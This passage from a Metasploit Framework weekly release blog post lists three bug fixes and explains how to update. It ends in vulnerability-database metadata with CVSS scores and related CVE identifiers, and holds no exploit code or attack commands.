[#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal book keeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}